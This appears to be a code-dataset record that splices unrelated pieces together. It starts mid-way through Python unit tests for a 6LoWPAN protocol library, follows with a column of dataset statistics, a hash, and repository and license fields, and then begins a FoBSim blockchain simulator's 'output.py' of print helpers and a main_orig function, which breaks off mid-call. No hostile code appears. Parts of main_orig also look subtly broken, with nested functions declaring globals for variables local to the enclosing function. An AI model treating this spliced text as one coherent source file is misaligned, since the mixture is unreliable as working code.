0x11, 0x01, 0x11, 0x01, 0x22
])
prefix_length = 128
address_bytes = bytearray(
[0x1a, 0x2b, 0x3c, 0x4d, 0x5e, 0x6f, 0x70, 0x81])
addr = prefix
# WHEN
actual_addr = factory._merge_prefix_with_address(
prefix, prefix_length, address_bytes)
# THEN
self.assertEqual(addr, actual_addr)
class TestContext(unittest.TestCase):
def test_should_extract_context_from_str_representation_when_constructor_called(
self):
# GIVEN
prefix = "2000:db8::/64"
# WHEN
c = lowpan.Context(prefix)
# THEN
self.assertEqual(
bytearray([0x20, 0x00, 0x0d, 0xb8, 0x00, 0x00, 0x00, 0x00]),
c.prefix)
self.assertEqual(64, c.prefix_length)
self.assertEqual(8, c.prefix_length_full_bytes)
def test_should_extract_context_from_bytearray_when_construct_called(self):
# GIVEN
prefix = bytearray([0x20, 0x00, 0x0d, 0xb8, 0x00, 0x00, 0x00, 0x00])
# WHEN
c = lowpan.Context(prefix)
# THEN
self.assertEqual(
bytearray([0x20, 0x00, 0x0d, 0xb8, 0x00, 0x00, 0x00, 0x00]),
c.prefix)
self.assertEqual(8, c.prefix_length_full_bytes)
self.assertEqual(64, c.prefix_length)
class TestContextManager(unittest.TestCase):
def test_should_raise_IndexError_when_index_is_larger_than_15(self):
# GIVEN
context_manager = lowpan.ContextManager()
index = random.randint(16, 255)
# WHEN
with self.assertRaises(IndexError):
context_manager[index] = any_context()
def test_should_raise_IndexError_when_index_is_smaller_than_0(self):
# GIVEN
context_manager = lowpan.ContextManager()
index = random.randint(-255, -1)
# WHEN
with self.assertRaises(IndexError):
context_manager[index] = any_context()
def test_should_raise_TypeError_when_set_value_is_not_Context(self):
# GIVEN
context_manager = lowpan.ContextManager()
# WHEN
with self.assertRaises(TypeError):
context_manager[0] = int
class TestLowpanMeshHeader(unittest.TestCase):
def test_should_return_hops_left_value_when_hops_left_property_called(self):
# GIVEN
hops_left = any_hops_left()
mesh_header = lowpan.LowpanMeshHeader(hops_left, any_mac_address(),
any_mac_address())
# WHEN
actual_hops_left = mesh_header.hops_left
# THEN
self.assertEqual(hops_left, actual_hops_left)
def test_should_return_originator_address_value_when_originator_address_property_called(
self):
# GIVEN
originator_address = any_mac_address()
mesh_header = lowpan.LowpanMeshHeader(any_hops_left(),
originator_address,
any_mac_address())
# WHEN
actual_originator_address = mesh_header.originator_address
# THEN
self.assertEqual(originator_address, actual_originator_address)
def test_should_return_final_destination_address_value_when_final_destination_address_property_called(
self):
# GIVEN
final_destination_address = any_mac_address()
mesh_header = lowpan.LowpanMeshHeader(any_hops_left(),
any_mac_address(),
final_destination_address)
# WHEN
actual_final_destination_address = mesh_header.final_destination_address
# THEN
self.assertEqual(final_destination_address,
actual_final_destination_address)
class TestLowpanMeshHeaderFactory(unittest.TestCase):
def test_should_create_LowpanMeshHeader_when_parse_method_called(self):
# GIVEN
hops_left = any_hops_left()
originator_address = any_mac_address()
final_destination_address = any_mac_address()
v = int(originator_address.type == common.MacAddressType.SHORT)
f = int(final_destination_address.type == common.MacAddressType.SHORT)
mesh_header_first_byte = (2 << 6) | (v << 5) | (f << 4)
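# Mesh header layout (RFC 4944): the dispatch starts with the bits 10, V and F
# flag short (16-bit) originator/final-destination addresses, and Hops Left
# sits in the low nibble; the value 0xF escapes to a full extra byte, which is
# why larger hop counts are encoded with two bytes below.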
if hops_left >= 0x0f:
mesh_header_data = bytearray(
[mesh_header_first_byte | 0x0f, hops_left])
else:
mesh_header_data = bytearray([mesh_header_first_byte | hops_left])
mesh_header_data += originator_address.mac_address + final_destination_address.mac_address
mesh_header_factory = lowpan.LowpanMeshHeaderFactory()
# WHEN
mesh_header = mesh_header_factory.parse(io.BytesIO(mesh_header_data),
None)
# THEN
self.assertEqual(hops_left, mesh_header.hops_left)
self.assertEqual(originator_address, mesh_header.originator_address)
self.assertEqual(final_destination_address,
mesh_header.final_destination_address)
class TestLowpanFragmentationHeader(unittest.TestCase):
def test_should_return_datagram_size_value_when_datagram_size_property_called(
self):
# GIVEN
datagram_size = any_datagram_size()
fragmentation_header = lowpan.LowpanFragmentationHeader(
datagram_size, any_datagram_tag(), any_datagram_offset())
# WHEN
actual_datagram_size = fragmentation_header.datagram_size
# THEN
self.assertEqual(datagram_size, actual_datagram_size)
def test_should_return_datagram_tag_value_when_datagram_tag_property_called(
self):
# GIVEN
datagram_tag = any_datagram_tag()
fragmentation_header = lowpan.LowpanFragmentationHeader(
any_datagram_size(), datagram_tag, any_datagram_offset())
# WHEN
actual_datagram_tag = fragmentation_header.datagram_tag
# THEN
self.assertEqual(datagram_tag, actual_datagram_tag)
def test_should_return_datagram_offset_value_when_datagram_offset_property_called(
self):
# GIVEN
datagram_offset = any_datagram_offset()
fragmentation_header = lowpan.LowpanFragmentationHeader(
any_datagram_size(), any_datagram_tag(), datagram_offset)
# WHEN
actual_datagram_offset = fragmentation_header.datagram_offset
# THEN
self.assertEqual(datagram_offset, actual_datagram_offset)
def test_should_return_False_when_is_first_property_called_and_datagram_offset_is_not_eq_0(
self):
# GIVEN
datagram_offset = random.randint(1, (1 << 8) - 1)
fragmentation_header = lowpan.LowpanFragmentationHeader(
any_datagram_size(), any_datagram_tag(), datagram_offset)
# WHEN
is_first = fragmentation_header.is_first
# THEN
self.assertFalse(is_first)
def test_should_create_LowpanFragmentationHeader_when_from_bytes_class_method_called(
self):
# GIVEN
datagram_size = any_datagram_size()
datagram_tag = any_datagram_tag()
datagram_offset = any_datagram_offset()
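# First 16-bit word: the top two bits (3 << 14) mark a fragmentation header,
# bit 13 distinguishes FRAGN (offset != 0) from FRAG1, and the low 11 bits
# carry the datagram size; the 16-bit tag and 8-bit offset follow.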
data = struct.pack(">HHB",
((3 << 14) |
(int(datagram_offset != 0) << 13) | datagram_size),
datagram_tag, datagram_offset)
# WHEN
fragmentation_header = lowpan.LowpanFragmentationHeader.from_bytes(
io.BytesIO(data))
# THEN
self.assertEqual(datagram_size, fragmentation_header.datagram_size)
self.assertEqual(datagram_tag, fragmentation_header.datagram_tag)
self.assertEqual(datagram_offset, fragmentation_header.datagram_offset)
class TestLowpanDecompressor(unittest.TestCase):
def test_should_parse_parent_request_when_decompress_method_called(self):
# GIVEN
data = bytearray([
0x7f, 0x3b, 0x02, 0xf0, 0x4d, 0x4c, 0x4d, 0x4c, 0x5e, 0xaf, 0x00,
0x15, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x3b,
0xfb, 0x0e, 0x3b, 0x15, 0xa1, 0xf9, 0xf5, 0x64, 0xf4, 0x99, 0xef,
0x70, 0x78, 0x6c, 0x3c, 0x0f, 0x54, 0x4e, 0x95, 0xe8, 0xf5, 0x27,
0x4c, 0xfc
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x12, 0xcf, 0xd3, 0x8b, 0x3b, 0x61, 0x55, 0x58]))
decompressor = config.create_default_lowpan_decompressor(
context_manager=None)
# WHEN
ipv6_header, extension_headers, udp_header = decompressor.decompress(
io.BytesIO(data), message_info)
# THEN
self.assertEqual("fe80::10cf:d38b:3b61:5558",
ipv6_header.source_address.compressed)
self.assertEqual("ff02::2", ipv6_header.destination_address.compressed)
self.assertEqual(17, ipv6_header.next_header)
self.assertEqual(255, ipv6_header.hop_limit)
self.assertEqual([], extension_headers)
def test_should_parse_parent_response_when_decompress_method_called(self):
# GIVEN
data = bytearray([
0x7f, 0x33, 0xf0, 0x4d, 0x4c, 0x4d, 0x4c, 0x0f, 0xe8, 0x00, 0x15,
0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x31, 0xb8,
0x16, 0x02, 0x61, 0xcc, 0x98, 0x90, 0xd6, 0xfd, 0x69, 0xd3, 0x89,
0xa0, 0x30, 0x49, 0x83, 0x7c, 0xf7, 0xb5, 0x7f, 0x83, 0x2a, 0x04,
0xf6, 0x3b, 0x8c, 0xe8, 0xb6, 0x37, 0x51, 0x5b, 0x28, 0x9a, 0x3b,
0xbe, 0x0d, 0xb3, 0x4e, 0x9f, 0xd8, 0x14, 0xc8, 0xc9, 0xf4, 0x28,
0xf6, 0x8d, 0xb7, 0xf0, 0x7d, 0x46, 0x13, 0xc2, 0xb1, 0x69, 0x4d,
0xae, 0xc1, 0x23, 0x16, 0x62, 0x90, 0xea, 0xff, 0x1b, 0xb7, 0xd7,
0x1e, 0x5c
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x3a, 0x3e, 0x9e, 0xed, 0x7a, 0x01, 0x36, 0xa5]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x12, 0xcf, 0xd3, 0x8b, 0x3b, 0x61, 0x55, 0x58]))
decompressor = config.create_default_lowpan_decompressor(
context_manager=None)
# WHEN
ipv6_header, extension_headers, udp_header = decompressor.decompress(
io.BytesIO(data), message_info)
# THEN
self.assertEqual("fe80::383e:9eed:7a01:36a5",
ipv6_header.source_address.compressed)
self.assertEqual("fe80::10cf:d38b:3b61:5558",
ipv6_header.destination_address.compressed)
self.assertEqual(17, ipv6_header.next_header)
self.assertEqual(255, ipv6_header.hop_limit)
self.assertEqual([], extension_headers)
self.assertEqual(19788, udp_header.src_port)
self.assertEqual(19788, udp_header.dst_port)
def test_should_parse_child_id_request_when_decompress_method_called(self):
# GIVEN
data = bytearray([
0x7f, 0x33, 0xf0, 0x4d, 0x4c, 0x4d, 0x4c, 0x9a, 0x62, 0x00, 0x15,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x14, 0x03,
0xe3, 0x72, 0x50, 0x4f, 0x8c, 0x5c, 0x42, 0x81, 0x68, 0xe2, 0x11,
0xfc, 0xf5, 0x8c, 0x62, 0x8e, 0x83, 0x99, 0xe7, 0x26, 0x86, 0x34,
0x3b, 0xa7, 0x68, 0xc7, 0x93, 0xfb, 0x72, 0xd9, 0xcc, 0x13, 0x5e,
0x5b, 0x96, 0x0e, 0xf1, 0x80, 0x03, 0x55, 0x4f, 0x27, 0xc2, 0x96,
0xf4, 0x9c, 0x65, 0x82, 0x97, 0xcf, 0x97, 0x35, 0x89, 0xc2
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x12, 0xcf, 0xd3, 0x8b, 0x3b, 0x61, 0x55, 0x58]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x3a, 0x3e, 0x9e, 0xed, 0x7a, 0x01, 0x36, 0xa5]))
decompressor = config.create_default_lowpan_decompressor(
context_manager=None)
# WHEN
ipv6_header, extension_headers, udp_header = decompressor.decompress(
io.BytesIO(data), message_info)
# THEN
self.assertEqual("fe80::10cf:d38b:3b61:5558",
ipv6_header.source_address.compressed)
self.assertEqual("fe80::383e:9eed:7a01:36a5",
ipv6_header.destination_address.compressed)
self.assertEqual(17, ipv6_header.next_header)
self.assertEqual(255, ipv6_header.hop_limit)
self.assertEqual([], extension_headers)
self.assertEqual(19788, udp_header.src_port)
self.assertEqual(19788, udp_header.dst_port)
def test_should_parse_child_id_response_when_decompress_method_called(self):
# GIVEN
data = bytearray([
0x7f, 0x33, 0xf0, 0x4d, 0x4c, 0x4d, 0x4c, 0x7b, 0xe3, 0x00, 0x15,
0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0xe0, 0x57,
0xbf, 0x2f, 0xc0, 0x4b, 0x1d, 0xac, 0x3c, 0x24, 0x16, 0xdf, 0xeb,
0x96, 0xeb, 0xda, 0x42, 0xeb, 0x00, 0x89, 0x5f, 0x39, 0xc9, 0x2b,
0x7d, 0x31, 0xd5, 0x83, 0x9d, 0xdb, 0xb7, 0xc8, 0xe6, 0x25, 0xd3,
0x7a, 0x1e, 0x5f, 0x66, 0x9e, 0x63, 0x2d, 0x42, 0x27, 0x19, 0x41,
0xdc, 0xc4, 0xc4, 0xc0, 0x8c, 0x07
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x3a, 0x3e, 0x9e, 0xed, 0x7a, 0x01, 0x36, 0xa5]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x12, 0xcf, 0xd3, 0x8b, 0x3b, 0x61, 0x55, 0x58]))
decompressor = config.create_default_lowpan_decompressor(
context_manager=None)
# WHEN
ipv6_header, extension_headers, udp_header = decompressor.decompress(
io.BytesIO(data), message_info)
# THEN
self.assertEqual("fe80::383e:9eed:7a01:36a5",
ipv6_header.source_address.compressed)
self.assertEqual("fe80::10cf:d38b:3b61:5558",
ipv6_header.destination_address.compressed)
self.assertEqual(17, ipv6_header.next_header)
self.assertEqual(255, ipv6_header.hop_limit)
self.assertEqual([], extension_headers)
self.assertEqual(19788, udp_header.src_port)
self.assertEqual(19788, udp_header.dst_port)
def test_should_parse_advertisement_when_decompress_method_called(self):
# GIVEN
data = bytearray([
0x7f, 0x3b, 0x01, 0xf0, 0x4d, 0x4c, 0x4d, 0x4c, 0x35, 0x9f, 0x00,
0x15, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x9e,
0xb8, 0xd0, 0x2f, 0x2a, 0xe0, 0x00, 0x5d, 0x66, 0x63, 0x05, 0xa0,
0x59, 0xb0, 0xd4, 0x95, 0x7f, 0xe6, 0x79, 0x17, 0x87, 0x2c, 0x1d,
0x83, 0xad, 0xc2, 0x64, 0x47, 0x20, 0x7a, 0xe2
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x3a, 0x3e, 0x9e, 0xed, 0x7a, 0x01, 0x36, 0xa5]))
decompressor = config.create_default_lowpan_decompressor(
context_manager=None)
# WHEN
ipv6_header, extension_headers, udp_header = decompressor.decompress(
io.BytesIO(data), message_info)
# THEN
self.assertEqual("fe80::383e:9eed:7a01:36a5",
ipv6_header.source_address.compressed)
self.assertEqual("ff02::1", ipv6_header.destination_address.compressed)
self.assertEqual(17, ipv6_header.next_header)
self.assertEqual(255, ipv6_header.hop_limit)
self.assertEqual([], extension_headers)
self.assertEqual(19788, udp_header.src_port)
self.assertEqual(19788, udp_header.dst_port)
class TestLowpanFragmentsBuffer(unittest.TestCase):
def test_should_raise_ValueError_when_write_method_called_with_data_length_bigger_than_buffer_length(
self):
# GIVEN
length = random.randint(1, 1280)
fragments_buffer = lowpan.LowpanFragmentsBuffer(buffer_size=(length -
1))
# THEN
self.assertRaises(ValueError, fragments_buffer.write, any_data(length))
def test_should_move_write_position_by_the_data_length_when_write_method_called(
self):
# GIVEN
length = random.randint(1, 1280)
fragments_buffer = lowpan.LowpanFragmentsBuffer(buffer_size=length)
start_position = fragments_buffer.tell()
data = any_data(length=random.randint(1, length))
# WHEN
fragments_buffer.write(data)
# THEN
self.assertEqual(fragments_buffer.tell() - start_position, len(data))
def test_should_raise_ValueError_when_read_method_called_but_not_whole_packet_has_been_stored_in_buffer(
self):
# GIVEN
data = any_data(length=3)
fragments_buffer = lowpan.LowpanFragmentsBuffer(
buffer_size=random.randint(4, 1280))
fragments_buffer.write(data)
# WHEN
self.assertRaises(ValueError, fragments_buffer.read)
def test_should_raise_ValueError_when_seek_method_called_with_offset_bigger_than_buffer_length(
self):
# GIVEN
offset = random.randint(1281, 2500)
fragments_buffer = lowpan.LowpanFragmentsBuffer(buffer_size=1280)
# THEN
self.assertRaises(ValueError, fragments_buffer.seek, offset)
def test_should_set_write_position_when_seek_method_called(self):
# GIVEN
length = random.randint(1, 1280)
offset = random.randint(0, length - 1)
fragments_buffer = lowpan.LowpanFragmentsBuffer(buffer_size=length)
# WHEN
fragments_buffer.seek(offset)
# THEN
self.assertEqual(offset, fragments_buffer.tell())
def test_should_write_whole_packet_to_buffer_when_write_method_called(self):
# GIVEN
data = any_data(length=random.randint(1, 1280))
fragments_buffer = lowpan.LowpanFragmentsBuffer(buffer_size=len(data))
# WHEN
fragments_buffer.write(data)
# THEN
self.assertEqual(data, fragments_buffer.read())
def test_should_write_many_frags_to_the_buffer_and_return_whole_message_when_write_method_called_many_times(
self):
# GIVEN
buffer_size = 42
fragments_buffer = lowpan.LowpanFragmentsBuffer(buffer_size=buffer_size)
offset_1 = 0
fragment_1 = bytearray([0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08])
offset_2 = 8
fragment_2 = bytearray([0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10])
offset_3 = 16
fragment_3 = bytearray([0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18])
offset_4 = 24
fragment_4 = bytearray([0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20])
offset_5 = 32
fragment_5 = bytearray([0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28])
offset_6 = 40
fragment_6 = bytearray([0x29, 0x2a])
# WHEN
fragments_buffer.seek(offset_1)
fragments_buffer.write(fragment_1)
fragments_buffer.seek(offset_2)
fragments_buffer.write(fragment_2)
fragments_buffer.seek(offset_3)
fragments_buffer.write(fragment_3)
fragments_buffer.seek(offset_4)
fragments_buffer.write(fragment_4)
fragments_buffer.seek(offset_5)
fragments_buffer.write(fragment_5)
fragments_buffer.seek(offset_6)
fragments_buffer.write(fragment_6)
# THEN
self.assertEqual(
bytearray([
0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a,
0x0b, 0x0c, 0x0d, 0x0e, 0x0f, 0x10, 0x11, 0x12, 0x13, 0x14,
0x15, 0x16, 0x17, 0x18, 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e,
0x1f, 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28,
0x29, 0x2a
]), fragments_buffer.read())
class TestLowpanFragmentsBuffersManager(unittest.TestCase):
def test_should_raise_ValueError_when_get_fragments_buffer_method_called_with_invalid_dgram_size(
self):
# GIVEN
message_info = common.MessageInfo()
message_info.source_mac_address = any_mac_address()
message_info.destination_mac_address = any_mac_address()
negative_int = -random.randint(1, 1280)
manager = lowpan.LowpanFragmentsBuffersManager()
# THEN
self.assertRaises(ValueError, manager.get_fragments_buffer,
message_info, any_datagram_tag(), None)
self.assertRaises(ValueError, manager.get_fragments_buffer,
message_info, any_datagram_tag(), negative_int)
def test_should_return_LowpanFragmentsBuffer_when_get_fragments_buffer_method_called_with_valid_dgram_size(
self):
# GIVEN
message_info = common.MessageInfo()
message_info.source_mac_address = any_mac_address()
message_info.destination_mac_address = any_mac_address()
datagram_size = any_datagram_size()
manager = lowpan.LowpanFragmentsBuffersManager()
# WHEN
fragments_buffer = manager.get_fragments_buffer(message_info,
any_datagram_tag(),
datagram_size)
# THEN
self.assertIsInstance(fragments_buffer, lowpan.LowpanFragmentsBuffer)
self.assertEqual(datagram_size, len(fragments_buffer))
if __name__ == "__main__":
unittest.main(verbosity=1)
| 31.58729
| 113
| 0.540461
| 13,774
| 127,739
| 4.753086
| 0.047699
| 0.041669
| 0.043624
| 0.038858
| 0.867907
| 0.844491
| 0.807817
| 0.790298
| 0.75761
| 0.729017
| 0
| 0.171957
| 0.368877
| 127,739
| 4,043
| 114
| 31.595103
| 0.640122
| 0.023572
| 0
| 0.792643
| 0
| 0
| 0.004203
| 0.002998
| 0
| 0
| 0.161112
| 0
| 0.073242
| 1
| 0.043294
| false
| 0
| 0.002604
| 0.012695
| 0.064779
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4644d7f0c17dd024ce57af0eeec62ca4c05913f4
| 25,995
|
py
|
Python
|
output.py
|
akosfenyvesi/fobsim-beeware
|
584d3b956b019fecb3264e6e631e4c91ec40d678
|
[
"CC0-1.0"
] | null | null | null |
output.py
|
akosfenyvesi/fobsim-beeware
|
584d3b956b019fecb3264e6e631e4c91ec40d678
|
[
"CC0-1.0"
] | null | null | null |
output.py
|
akosfenyvesi/fobsim-beeware
|
584d3b956b019fecb3264e6e631e4c91ec40d678
|
[
"CC0-1.0"
] | null | null | null |
def genesis_block_generation():
print("\nGenesis Block is generated. The Blockchain system is up...!")
print("Miners will now collect transactions from memPool and start building blocks...\n\n")
def block_info(block, consensus_algorithm):
print("The following block has been proposed by " + block['Header']['generator_id'] +
" and is generated into the Blockchain network")
print("**************************")
print("transactions:")
print(block['Body']['transactions'])
print("hash:")
print(block['Header']['hash'])
print("timestamp:")
print(block['Body']['timestamp'])
if consensus_algorithm == 1:
print("nonce:")
print(block['Body']['nonce'])
print("previous_hash:")
print(block['Body']['previous_hash'])
print("**************************")
def block_success_addition(self_address, generator_id):
print("*******************************************")
print("the block is now added to the local chain of " + self_address)
if generator_id != self_address:
print("this block was received from " + generator_id)
print("##############################\n")
def simulation_progress(current_chain_length, expected_chain_length):
# print("The simulation have passed " + str(100*((current_chain_length+1)/expected_chain_length)) + "% of TXs to miners")
# print("Miners will mint new valid blocks and generate them to The BC network")
pass
def fork_analysis(number_of_forks):
if number_of_forks == 1:
print("\n##############################\nThere were no forks during this run\n#############################\n")
else:
print("\n##############################\nAs the simulation is finished, " + str(number_of_forks) + " different versions of chains were found\n#############################\n")
def mempool_info(mempool):
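# queue.Queue offers no non-destructive iteration, so drain the mempool into a
# list, print each transaction, and put every item back to leave it unchanged.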
print('mempool contains the following TXs:')
txs = []
for i in range(mempool.qsize()):
txs.append(mempool.get())
for tx in txs:
print(tx)
mempool.put(tx)
def authorization_trigger(blockchain_placement, no_fogs, no_miners):
print("please input the address of authorized:")
if blockchain_placement == 1:
print("Fog Nodes")
else:
print("End-users")
print("to generate new blocks in the exact following format:")
print(">>>> 1 OR 3 OR 50 ... (up to: ")
if blockchain_placement == 1:
print(str(no_fogs) + " fog nodes available")
else:
print(str(no_miners) + " miners available in the EU layer")
print("Once done, kindly input: done")
def choose_functionality():
print("Please choose the function of the Blockchain network:\n"
"(1) Data Management\n"
"(2) Computational services\n"
"(3) Payment\n"
"(4) Identity Management\n")
def choose_placement():
print("Please choose the placement of the Blockchain network:\n"
"(1) Fog Layer\n"
"(2) End-User layer\n")
def choose_consensus(dict_of_consensus_algos):
print("\nPlease choose the Consensus algorithm to be used in the simulation:\n")
for key in dict_of_consensus_algos:
print(key + ': ' + dict_of_consensus_algos[key])
def txs_success(txs_per_user, parent_add, self_add):
print(str(txs_per_user) + " data records had been generated by End-User no. " + str(parent_add) + "." + str(self_add))
def GDPR_warning():
print("###########################################"
"\nWARNING: Each end-user's address and the address of the fog component it is connected with,\n "
"will be immutably saved on the chain. This is not a GDPR-compliant practice.\n"
"if you need to have your application GDPR-compliant, you need to change the configuration,\n"
" so that other types of identities be saved on the immutable chain, and re-run the simulation."
"\n###########################################\n")
def miners_are_up():
print("*****************\nMiner nodes are up, connected to their neighbors, and waiting for the genesis block...!\n")
def illegal_tx(tx, wallet_content):
print("the following transaction is illegal:")
print(tx)
print("the end_user_wallet contains only " + str(wallet_content) + " digital coins..!")
print("the transaction is withdrawn from the block")
def illegal_block():
print("The proposed block is not valid."
"\nTransactions will be sent back to the mempool and mined again..!")
def unauthorized_miner_msg(miner_address):
print("Miner: " + miner_address + " is not authorized to generate a new block..!")
def block_discarded():
print("The received block was ignored because it is already in the local chain")
def users_and_fogs_are_up():
print("*****************\nEnd_users are up\nFog nodes are up\nEnd-Users are connected to their Fog nodes...\n")
def user_identity_addition_reminder(Num_endusers):
print("The network has " + str(Num_endusers) +
" end_users.\n For each of them, you need to input the value of newly added identity "
"attributes(if any)\n")
def local_chain_is_updated(miner_address, length_of_local_chain):
print("Using the Gossip protocol of FoBSim, the local chain of the following miner was updated:")
print("Miner: " + str(miner_address))
print("The length of the new local chain: " + str(length_of_local_chain))
def mempool_is_empty():
print("mempool is empty")
def finish():
print("simulation is done.")
print("To check/analyze the experiment, please refer to the temporary folder.")
print("There, you can find:")
print("- miners' local chains")
print("- miners' local records of users' wallets")
print("- log of blocks confirmed by the majority of miners")
print("- log of final amounts in miners' wallets (initial values - staked values + awards)")
print("- log of values which were staked by miners")
print("thank YOU..!")
def main_orig():
import Fog
import end_user
import miner
import blockchain
import random
import output
from math import ceil
import time
import modification
import new_consensus_module
data = modification.read_file("Sim_parameters.json")
list_of_end_users = []
fogNodes = []
transactions_list = []
list_of_authorized_miners = []
blockchainFunction = 0
blockchainPlacement = 0
number_of_miner_neighbours = data["number_of_each_miner_neighbours"]
NumOfFogNodes = data["NumOfFogNodes"]
NumOfTaskPerUser = data["NumOfTaskPerUser"]
NumOfMiners = data["NumOfMiners"]
numOfTXperBlock = data["numOfTXperBlock"]
num_of_users_per_fog_node = data["num_of_users_per_fog_node"]
blockchain_functions = ['1', '2', '3', '4']
blockchain_placement_options = ['1', '2']
expected_chain_length = ceil((num_of_users_per_fog_node * NumOfTaskPerUser * NumOfFogNodes) / numOfTXperBlock)
gossip_activated = data["Gossip_Activated"]
Automatic_PoA_miners_authorization = data["Automatic_PoA_miners_authorization?"]
Parallel_PoW_mining = data["Parallel_PoW_mining?"]
trans_delay = 0
delay_between_fog_nodes = data["delay_between_fog_nodes"]
delay_between_end_users = data["delay_between_end_users"]
poet_block_time = data['poet_block_time']
Asymmetric_key_length = data['Asymmetric_key_length']
number_of_DPoS_delegates = data['Num_of_DPoS_delegates']
def user_input():
modification.initiate_files(gossip_activated)
choose_functionality()
choose_placement()
def choose_functionality():
while True:
output.choose_functionality()
global blockchainFunction
blockchainFunction = input()
if blockchainFunction in blockchain_functions:
blockchainFunction = int(blockchainFunction)
break
else:
print("Input is incorrect, try again..!")
def choose_placement():
while True:
output.choose_placement()
global blockchainPlacement
blockchainPlacement = input()
if blockchainPlacement in blockchain_placement_options:
blockchainPlacement = int(blockchainPlacement)
break
else:
print("Input is incorrect, try again..!")
def initiate_network():
for count in range(NumOfFogNodes):
fogNodes.append(Fog.Fog(count + 1))
for p in range(num_of_users_per_fog_node):
list_of_end_users.append(end_user.User(p + 1, count + 1))
output.users_and_fogs_are_up()
if blockchainFunction == 4:
output.GDPR_warning()
while True:
print("If you don't want other attributes to be added to end_users, input: done\n")
new_attribute = input("If you want other attributes to be added to end_users, input them next:\n")
if new_attribute == 'done':
break
else:
for user in list_of_end_users:
user.identity_added_attributes[new_attribute] = ''
output.user_identity_addition_reminder(len(list_of_end_users))
for user in list_of_end_users:
user.create_tasks(NumOfTaskPerUser, blockchainFunction, list_of_end_users)
user.send_tasks(fogNodes)
print("End_user " + str(user.addressParent) + "." + str(
user.addressSelf) + " had sent its tasks to the fog layer")
def initiate_miners():
the_miners_list = []
if blockchainPlacement == 1:
for i in range(NumOfFogNodes):
the_miners_list.append(miner.Miner(i + 1, trans_delay, gossip_activated))
if blockchainPlacement == 2:
for i in range(NumOfMiners):
the_miners_list.append(miner.Miner(i + 1, trans_delay, gossip_activated))
for entity in the_miners_list:
modification.write_file("temporary/" + entity.address + "_local_chain.json", {})
miner_wallets_log_py = modification.read_file("temporary/miner_wallets_log.json")
miner_wallets_log_py[str(entity.address)] = data['miners_initial_wallet_value']
modification.rewrite_file("temporary/miner_wallets_log.json", miner_wallets_log_py)
print('Miners have been initiated..')
connect_miners(the_miners_list)
output.miners_are_up()
return the_miners_list
def define_trans_delay(layer):
transmission_delay = 0
if layer == 1:
transmission_delay = delay_between_fog_nodes
if layer == 2:
transmission_delay = delay_between_end_users
return transmission_delay
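# The three helpers below build the miners' P2P topology: create_components()
# gives each miner a random set of neighbours (links are added in both
# directions) and records each miner with its neighbours as a component;
# connect_miners() then picks one bridge node per component, and bridging()
# links the bridges pairwise until only one remains, so the network ends up
# connected.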
def connect_miners(miners_list):
print("Miners will be connected in a P2P fashion now. Hold on...")
bridges = set()
all_components = create_components(miners_list)
for comp in all_components:
bridge = random.choice(tuple(comp))
bridges.add(bridge)
bridging(bridges, miners_list)
def bridging(bridges, miners_list):
while len(bridges) != 1:
bridge = random.choice(tuple(bridges))
other_bridge = random.choice(tuple(bridges))
same_bridge = True
while same_bridge:
other_bridge = random.choice(tuple(bridges))
if other_bridge != bridge:
same_bridge = False
for entity in miners_list:
if entity.address == bridge:
entity.neighbours.add(other_bridge)
if entity.address == other_bridge:
entity.neighbours.add(bridge)
bridges.remove(bridge)
def create_components(miners_list):
all_components = set()
for entity in miners_list:
component = set()
while len(entity.neighbours) < number_of_miner_neighbours:
neighbour = random.choice(miners_list).address
if neighbour != entity.address:
entity.neighbours.add(neighbour)
component.add(neighbour)
for entity_2 in miners_list:
if entity_2.address == neighbour:
entity_2.neighbours.add(entity.address)
component.add(entity.address)
break
if component:
all_components.add(tuple(component))
return all_components
def give_miners_authorization(the_miners_list, the_type_of_consensus):
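# Consensus code 3 is treated as Proof-of-Authority here (see the
# Automatic_PoA_miners_authorization flag): either every miner is authorized
# automatically, or the operator types in the authorized addresses.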
if the_type_of_consensus == 3:
# automated approach:
if Automatic_PoA_miners_authorization:
for i in range(len(the_miners_list)):
the_miners_list[i].isAuthorized = True
list_of_authorized_miners.append(the_miners_list[i])
else:
# user input approach:
output.authorization_trigger(blockchainPlacement, NumOfFogNodes, NumOfMiners)
while True:
authorized_miner = input()
if authorized_miner == "done":
break
else:
for node in the_miners_list:
if node.address == "Miner_" + authorized_miner:
node.isAuthorized = True
list_of_authorized_miners.append(node)
def initiate_genesis_block():
genesis_transactions = ["genesis_block"]
for i in range(len(miner_list)):
genesis_transactions.append(miner_list[i].address)
genesis_block = new_consensus_module.generate_new_block(genesis_transactions, 'The Network', 0,
type_of_consensus)
